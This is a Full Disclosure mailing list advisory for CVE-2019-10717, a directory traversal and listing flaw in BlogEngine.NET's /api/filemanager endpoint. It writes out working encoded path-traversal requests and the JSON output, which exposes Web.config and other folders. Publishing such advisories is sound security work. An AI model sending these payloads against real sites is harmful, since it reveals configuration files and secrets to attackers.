[prev in list] [next in list] [prev in thread] [next in thread]
List: full-disclosure
Subject: [FD] BlogEngine.NET 3.3.7 and earlier Directory Traversal + Listing
From: aaron bishop <abishop () linux ! com>
Date: 2019-06-24 23:42:26
Message-ID: CA+Ma4JtxC9EB_ot_QV9jPyNf=R-XweRgQGQzfh4p-h0HJD4eDw () mail ! gmail ! com
[Download RAW message or body]
*CVE-2019-10717* - A Directory Traversal + Directory Listing exists on
BlogEngine.Net 3.3.7 and earlier through the *path* parameter used by the
/api/filemanager endpoint. A request such as:
https://$HOST/api/filemanager?path=*%2F..%2f..%2f*
Discloses the contents of the application root:
....
{
"IsChecked": false,
"SortOrder": 25,
"Created": "5/26/2018 1:53:02 PM",
"Name": "Web.config",
"FileSize": "19.41 kb",
"FileType": 1,
"FullPath": "/../../Web.config",
"ImgPlaceholder": "fa fa-file-o"
},
....
The contents of additional directories can be viewed by modifying the path:
https://$HOST/api/filemanager?path=*%2F..%2f..%2fContent*
...
{
"IsChecked": false,
"SortOrder": 15,
"Created": "3/30/2019 9:09:23 PM",
"Name": "toastr.scss",
"FileSize": "6.92 kb",
"FileType": 1,
"FullPath": "/../../Content/toastr.scss",
"ImgPlaceholder": "fa fa-file-o"
}
...
Disclosure:
https://www.securitymetrics.com/blog/Blogenginenet-Directory-Traversal-Listing-Login-Page-Unvalidated-Redirect
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
[prev in list] [next in list] [prev in thread] [next in thread]
Configure |
About |
News |
Add a list |
Sponsored by KoreLogic